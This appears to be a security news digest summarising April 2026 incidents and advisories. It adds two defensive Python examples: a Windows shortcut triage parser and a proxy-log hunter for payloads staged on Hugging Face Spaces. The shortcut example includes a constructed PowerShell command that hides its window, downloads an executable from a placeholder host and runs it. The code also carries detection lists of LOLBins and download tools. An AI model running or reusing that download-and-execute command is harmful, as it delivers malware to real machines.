OpenAI Launches GPT-5.4-Cyber with Expanded Access for Security Teams
OpenAI unveiled GPT-5.4-Cyber this week, a variant of its flagship GPT-5.4 model specifically optimized for defensive cybersecurity use cases, arriving just days after Anthropic’s own controlled release of its Mythos frontier model as part of Project Glasswing. Alongside the model launch, OpenAI said it is scaling its Trusted Access for Cyber program to thousands of authenticated individual defenders and hundreds of teams responsible for securing critical software, with the goal of giving legitimate defenders a head start while simultaneously hardening safeguards against jailbreaks and adversarial prompt injections. The company also revealed that its AI-powered Codex Security application security agent has already contributed to over 3,000 critical and high-severity vulnerability fixes, framing its broader vision as shifting security from “episodic audits and static bug inventories to ongoing, tangible risk reduction.”
Cisco Patches Critical Vulnerabilities in Webex and Identity Services Engine
Cisco released patches this week for four critical-severity flaws across its Webex and Identity Services Engine (ISE) products, the most severe rated CVSS 9.9 and permitting remote code execution. The Webex flaw (CVE-2026-20184, CVSS 9.8) stems from improper certificate validation in Webex's SSO integration with Control Hub, letting a remote attacker impersonate any user of the service and gain unauthorized access. Two of the ISE flaws, both rated CVSS 9.9, let an attacker who already holds administrative credentials execute arbitrary code on the appliance via crafted HTTP requests. Organizations running these products should patch immediately, prioritizing any deployment whose administrative interface is reachable from the internet, and, given the impersonation risk on Webex, review Control Hub sign-in activity for identities that do not match the expected SSO population.
Booking.com Breach Sparks Scam Wave Targeting Travelers’ Reservations
Booking.com began notifying customers this week that unauthorized third parties accessed reservation information tied to upcoming trips. The company confirmed it detected suspicious activity and immediately took steps to contain the issue, including resetting PINs on affected bookings. The breach has already triggered a wave of targeted phishing, with affected customers reporting convincing fake emails, phone calls and WhatsApp messages from actors posing as hotel staff or check-in managers and quoting the stolen reservation details to make their demands for "payment confirmation" credible. The full scope of the incident remains unclear, including how the breach occurred and whether the data has been offered for sale, but the combination of travel details, upcoming booking dates and personal contact information makes the stolen data particularly effective for social engineering. Travelers with upcoming bookings should treat any payment request as suspect and verify it in the Booking.com app or by calling the property on a number taken from its own website, not from the message.
Ukraine’s CERT-UA Warns of UAC-0247 Campaign Targeting Clinics and Emergency Hospitals
Ukraine's Computer Emergency Response Team disclosed a campaign by the threat cluster UAC-0247 that targeted government entities and municipal healthcare facilities, including clinics and emergency hospitals, in March and April 2026, deploying malware designed to steal sensitive data from Chromium-based browsers and WhatsApp. The attack chain begins with a phishing email disguised as a humanitarian aid proposal that directs victims either to an AI-generated fake site or to a legitimate site compromised via XSS; the page serves a Windows shortcut (.lnk) file which, once opened, triggers the malware download. The targeting of emergency medical infrastructure during an active conflict is particularly alarming, since disruption of these systems carries direct risk to patient safety and emergency response capabilities.
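The shortcut stage in chains like this one is where a responder gets the first hard indicator, because a .lnk that poses as a document still has to carry the interpreter and command line it launches. The following is an added example for this digest, not code from CERT-UA or from the UAC-0247 report: CERT-UA has not published the campaign's shortcut content here, so the sample .lnk is constructed inline with a builder that is also part of the example. The parser follows the [MS-SHLLINK] layout (76-byte header, optional IDList and LinkInfo, then StringData) and the triage heuristics (LOLBin launch, embedded URL, minimized window, oversized command line) are assumptions about what a malicious downloader shortcut looks like, not indicators from the campaign.

```python
import re
import struct

# Shell Link header constants from [MS-SHLLINK]
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that starts the target minimized

# Interpreters and download helpers that a shortcut posing as a document has
# no business launching (heuristic list, not exhaustive).
LOLBINS = ("powershell", "pwsh", "cmd", "mshta", "rundll32", "regsvr32",
           "wscript", "cscript", "certutil", "bitsadmin", "curl")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def _read_string(data, pos, unicode):
    """One StringData entry: 2-byte character count, then the characters."""
    (count,) = struct.unpack_from("<H", data, pos)
    pos += 2
    size = count * 2 if unicode else count
    raw = data[pos:pos + size]
    text = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", "replace")
    return text, pos + size


def parse_lnk(data):
    """Return LinkFlags, ShowCommand and the StringData fields of a .lnk blob.

    LinkTargetIDList (binary shell items) and LinkInfo are skipped, so the
    recovered target is whatever the author put in RELATIVE_PATH/arguments.
    """
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]  # IDListSize excludes itself
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]      # LinkInfoSize includes itself
    info = {"flags": flags, "show_command": show_command}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:
            info[name], pos = _read_string(data, pos, bool(flags & IS_UNICODE))
    return info


def triage_lnk(data):
    """Return the reasons a shortcut looks like a downloader; empty if none."""
    info = parse_lnk(data)
    args = info.get("arguments", "")
    target = (info.get("relative_path", "") + " " + args).lower()
    reasons = []
    for binary in LOLBINS:
        if re.search(r"(^|[\\\s\"'])" + binary + r"(\.exe)?($|[\s\"'])", target):
            reasons.append("launches " + binary)
    urls = URL_RE.findall(args)
    if urls:
        reasons.append("arguments contain URL: " + ", ".join(urls))
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window starts minimized (SW_SHOWMINNOACTIVE)")
    if len(args) > 200:
        reasons.append("unusually long command line")
    return reasons


def build_lnk(relative_path, arguments, working_dir=".", show_command=1, unicode=True):
    """Build a minimal .lnk (header + StringData only). Test fixture for this
    example, not a file recovered from the campaign."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | (IS_UNICODE if unicode else 0)
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
    header += struct.pack("<I", 0x80) + b"\x00" * 24                   # attributes, three FILETIMEs
    header += struct.pack("<IIIHHII", 0, 0, show_command, 0, 0, 0, 0)  # size, icon, show, hotkey, reserved
    body = b""
    for text in (relative_path, working_dir, arguments):              # spec-mandated order
        body += struct.pack("<H", len(text))
        body += text.encode("utf-16-le") if unicode else text.encode("cp1252")
    return header + body


# Constructed sample: a shortcut that hides PowerShell and pulls a stage-2.
SAMPLE_MALICIOUS = build_lnk(
    "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    '-w hidden -nop -c "iwr https://example.invalid/aid.pdf.exe -o $env:TEMP\\a.exe; & $env:TEMP\\a.exe"',
    show_command=SW_SHOWMINNOACTIVE,
)
SAMPLE_BENIGN = build_lnk("..\\Documents\\Proposal.docx", "")

if __name__ == "__main__":
    for label, blob in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, triage_lnk(blob) or "no findings")
```

Run it against a directory of quarantined attachments by reading each file in binary mode and passing the bytes to `triage_lnk`; a `ValueError` means the file is not a Shell Link at all, which is itself worth noting when the extension says otherwise. Real-world shortcuts usually carry their target in the LinkTargetIDList rather than RELATIVE_PATH, so for complete coverage extend `parse_lnk` to decode shell items or pair it with a full LNK parser; the arguments string, where the download command lives, is parsed fully here.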
Marimo RCE Exploit Now Deploys NKAbuse Malware Hosted on Hugging Face
Threat actors exploiting the critical Marimo pre-authentication RCE vulnerability (CVE-2026-39987) escalated their attacks this week and are now deploying a new variant of the NKAbuse malware hosted directly on Hugging Face Spaces, a tactic that borrows the AI platform's trusted infrastructure to stage and deliver payloads past reputation-based filtering. NKAbuse is a Go-based backdoor that uses the NKN (New Kind of Network) blockchain-based peer-to-peer protocol for command and control, which leaves defenders with no fixed C2 domain or IP to block or sinkhole: traffic goes to whichever NKN peers are nearby and looks like any other participant in that network. An actively exploited pre-authentication RCE in a tool popular with data scientists and ML practitioners, combined with a decentralized-C2 backdoor staged on a widely trusted AI platform, represents a significant escalation in this campaign's sophistication.
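Since the NKN channel itself offers little to block, the practical hunting point is the staging download: a data-science host fetching a binary or script from Hugging Face Spaces with a command-line client rather than a browser. What follows is an added example for this digest, not code from the researchers tracking this campaign, and it rests on assumptions: the log lines are a constructed, simplified proxy format (timestamp, client IP, method, URL, status, quoted user agent), Spaces content is assumed to be served either under `huggingface.co/spaces/<owner>/<space>/...` or from a `*.hf.space` host, and the "payload-like" and "non-browser client" tests are heuristics, not published indicators.

```python
import re
from urllib.parse import urlsplit

# Constructed proxy log format: ts client method url status "user-agent"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$')

# Clients that a human browsing a demo app would not present.
TOOL_UA_RE = re.compile(
    r"^(curl|wget|python-requests|python-urllib|go-http-client|powershell|libwww-perl)\b",
    re.IGNORECASE)
PAYLOAD_EXT = (".sh", ".elf", ".bin", ".exe", ".dll", ".so", ".ps1", ".tar", ".gz", ".zip")


def is_spaces_url(url):
    """True for URLs that resolve to Hugging Face Spaces content (assumed shapes)."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if host == "huggingface.co" or host.endswith(".huggingface.co"):
        return parts.path.startswith("/spaces/")
    return host == "hf.space" or host.endswith(".hf.space")


def hunt_spaces_downloads(lines, marimo_hosts=frozenset()):
    """Flag Spaces fetches that look like payload staging rather than browsing.

    marimo_hosts: client IPs known to run Marimo; hits from them are rated high
    because the page's attack chain starts with the Marimo RCE.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or not is_spaces_url(m["url"]):
            continue
        reasons = []
        if TOOL_UA_RE.match(m["ua"]):
            reasons.append("non-browser client: " + m["ua"])
        path = urlsplit(m["url"]).path
        name = path.rsplit("/", 1)[-1]
        # Extensionless objects pulled via /resolve/ are typical of Linux ELF drops.
        if name.lower().endswith(PAYLOAD_EXT) or ("." not in name and "/resolve/" in path):
            reasons.append("payload-like object: " + name)
        if not reasons:
            continue
        severity = "high" if m["client"] in marimo_hosts else "medium"
        findings.append({"client": m["client"], "url": m["url"],
                         "severity": severity, "reasons": reasons})
    return findings


# Constructed sample log: one analyst browsing a demo, one host pulling a drop.
SAMPLE_LOG = [
    '2026-04-16T09:12:03Z 10.20.5.17 GET https://huggingface.co/spaces/alice/demo-app/resolve/main/app.py 200 "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/124.0"',
    '2026-04-16T09:13:41Z 10.20.5.44 GET https://huggingface.co/spaces/notsoml/helper/resolve/main/nk_linux_amd64 200 "curl/8.5.0"',
    '2026-04-16T09:13:42Z 10.20.5.44 GET https://xyz-helper.hf.space/loader.sh 200 "Wget/1.21"',
    '2026-04-16T09:15:00Z 10.20.5.17 GET https://huggingface.co/models 200 "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/124.0"',
]

if __name__ == "__main__":
    for hit in hunt_spaces_downloads(SAMPLE_LOG, marimo_hosts={"10.20.5.44"}):
        print(hit["severity"], hit["client"], hit["url"], "; ".join(hit["reasons"]))
```

Feed it real proxy exports after adjusting `LOG_RE` to the local format; the two heuristics are deliberately independent so that a browser download of `loader.sh` and a `curl` fetch of an innocuous `app.py` both still surface, with the Marimo host list deciding which hits go to the top of the queue.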
The post InfoSec News Nuggets 04/17/2026 appeared first on AboutDFIR – The Definitive Compendium Project.